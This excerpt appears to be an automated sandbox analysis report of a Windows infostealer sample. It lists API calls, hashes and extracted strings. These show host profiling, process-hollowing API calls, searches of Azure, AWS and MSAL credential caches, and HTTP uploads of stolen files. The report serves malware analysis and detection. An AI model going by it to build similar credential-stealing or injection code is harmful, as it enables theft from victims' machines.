                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBF0F9B19193028FC304DF28C694926BBE0FFC8644F018A5CA88897351D630EA84CB92
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32 ref: 0042D449
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InformationTimeZone
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 565725191-0
                                                                                                                                                                                                                                                        • Opcode ID: 089269d245f97865d6e96952320cc961d4c70f0e88486dd6361ed9ce0b372ca4
                                                                                                                                                                                                                                                        • Instruction ID: acbb689d5094415d14e2d0f19700c90219611dae1691e3ba05c5fb269b599d58
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 089269d245f97865d6e96952320cc961d4c70f0e88486dd6361ed9ce0b372ca4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5F08C7A204202EFC210EB39DD88F1937F8DB49315B060254E510873A5D23598909A41
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0042DFB5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                                        • Opcode ID: bd1a9e4dd3e7876b304708ca0883e2b5306f9a8f12906da4c58e03e2591602ce
                                                                                                                                                                                                                                                        • Instruction ID: 94d1152bbe3f1173c21cce2b822cec5dbf9eed480023797ab6e12cec23ae59db
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd1a9e4dd3e7876b304708ca0883e2b5306f9a8f12906da4c58e03e2591602ce
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51E08CB23402149BE7088F0CCC85F2533E1ABC8709F05092CBA42CB2A2F664DC008A2D
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 004151FE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                                                                                                        • Opcode ID: 90f1e888241cb1ec3522784cd6b161d10e531bb1ef10c33bfda20f5565286229
                                                                                                                                                                                                                                                        • Instruction ID: c505ba39ef20379c4645ff65d94c463da6b614d9bb8881772fb149c790f2d06d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90f1e888241cb1ec3522784cd6b161d10e531bb1ef10c33bfda20f5565286229
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3E08C7160020A8FEB01CB64CC85DA5B776FF88348B1004A8E1159B365E772EC06CB00
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: c$
                                                                                                                                                                                                                                                        • API String ID: 0-2531412009
                                                                                                                                                                                                                                                        • Opcode ID: 82e2565ac35b3a0b447ca74fd8f845529af7dc38640e08d73f5c05abb39b2009
                                                                                                                                                                                                                                                        • Instruction ID: 76f8c5f3ba02ff550ff9308846211c5ad4603f81bf3bed1e82a44f4a257194a3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82e2565ac35b3a0b447ca74fd8f845529af7dc38640e08d73f5c05abb39b2009
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0941966440D1D05ACB26577A40D49A2BFE25EAF20DB2ED0CEE0D45E373C16BC947DB25

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 0 433def-43505d call 42d523 228 43505f-435513 lstrlenA 0->228
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00435448
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                        • API String ID: 1659193697-1014693891
                                                                                                                                                                                                                                                        • Opcode ID: 2d5b23938c28d0a586785e9ce2f673269f8948ef176f9d383664fd4fba54a98b
                                                                                                                                                                                                                                                        • Instruction ID: 34db55e01f5c8ab7ca91c860d828c47d7678525bac6b5c30a7ffb8d33252fe5a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d5b23938c28d0a586785e9ce2f673269f8948ef176f9d383664fd4fba54a98b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74E2F7B5B02201AFC355EB5CECC59BAB7E5FF8C205B44006CF81AC7722CA68ED558B59

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 286 43d1d5-43dde4 LoadLibraryA * 7
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0065FB57), ref: 0043DC84
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0065FB64), ref: 0043DCA7
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0065FB6F), ref: 0043DCCA
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0065FB7B), ref: 0043DCED
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0065FBA2), ref: 0043DD56
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(0065FBAD), ref: 0043DD79
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 0043DDBF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                                                                        • String ID: CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll$m&q9$m&q9
                                                                                                                                                                                                                                                        • API String ID: 1029625771-279033102
                                                                                                                                                                                                                                                        • Opcode ID: 4f68f082125b678358cfba96fd582cef98a87372e4dcaa70b5914f3c3bc83993
                                                                                                                                                                                                                                                        • Instruction ID: 24e71b90f7b2db1066770ddba542897ddfe30af0ad822bed4a36ffa38b3fd459
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f68f082125b678358cfba96fd582cef98a87372e4dcaa70b5914f3c3bc83993
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE7278362067459FD308DF26DCE8D51BBA6FB8E30971442A9EA059736FF631A910DF08

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 00414FCA
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 00414FEF
                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,?,",?,?,file_data,?,build_id,?,",?,00660CAC), ref: 00415013
                                                                                                                                                                                                                                                        • memcpy.MSVCRT(00000000,00660CAC,00000000,?,?,",?,?,file_data,?,build_id,?,",?,00660CAC), ref: 0041505B
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 00415086
                                                                                                                                                                                                                                                        • memcpy.MSVCRT(00000000,?,?,?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 00415091
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 004150BC
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 004150F8
                                                                                                                                                                                                                                                        • memcpy.MSVCRT(?,00660CAC,00000000,?,?,?,?,?,file_data,?,build_id,?,",?,00660CAC), ref: 004150FF
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,file_data,?,build_id,?,",?,00660CAC), ref: 0041513D
                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,file_data,?,build_id), ref: 0041515E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: lstrlen$memcpy$AllocateHeapHttpRequestSend
                                                                                                                                                                                                                                                        • String ID: "$------$build_id$file_data
                                                                                                                                                                                                                                                        • API String ID: 2996894842-481700987
                                                                                                                                                                                                                                                        • Opcode ID: 4cc6afd63a2352e420ade48c1fc2f85cad42bef2741cdeb8d9bf13fc92d6d66c
                                                                                                                                                                                                                                                        • Instruction ID: 7e59a43fb92f708acd753c271b489475c7d4a1d1423ecfc975b3740fcb1c6fc3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cc6afd63a2352e420ade48c1fc2f85cad42bef2741cdeb8d9bf13fc92d6d66c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6562E1353012109FD712DB6DEC85A6AF3FABF883467480479E816C7372CA25EE09CB58

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                        • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                        • API String ID: 2221118986-3645552435
                                                                                                                                                                                                                                                        • Opcode ID: 51e869dcd3b6f677a8cb302e85ce408046a46f74e45f9a3a55c7ac45e0a7eb9a
                                                                                                                                                                                                                                                        • Instruction ID: 383a12688e8010a4742b0d5500bcaeafe37ba5c7293955c951a3f4013cd9ba2d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51e869dcd3b6f677a8cb302e85ce408046a46f74e45f9a3a55c7ac45e0a7eb9a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFB119B6B003049FC714DB6CDCC5EA973F9EF98701B090165E909CB3A2E674F9688B95

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 493 416a5f-417234 memcpy * 2 588 417239-41726d InternetReadFile 493->588 589 417289-4172d2 588->589 589->588
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 0041715A
                                                                                                                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000000), ref: 004171D0
                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,000000C7,?), ref: 00417251
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memcpy$FileInternetRead
                                                                                                                                                                                                                                                        • String ID: "$------$build_id$dU:lU:\U:$mode
                                                                                                                                                                                                                                                        • API String ID: 2059747129-4215338564
                                                                                                                                                                                                                                                        • Opcode ID: a076d046c773eaae75021768de4de57e91460f3f4f46ac38150c3be6442301ad
                                                                                                                                                                                                                                                        • Instruction ID: fe4d41c36e3f85450e8ad071882540042e873538d42cdc3b7df480d0a4b406d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a076d046c773eaae75021768de4de57e91460f3f4f46ac38150c3be6442301ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82324C753042108FC705CB5DED81EAAB7F6BFC824536500BAE855C7362DBA0ED26CB59

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 593 4159ee-415f77 lstrlenA * 2 InternetReadFile
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,",?,?,build_id,?,"), ref: 00415EE8
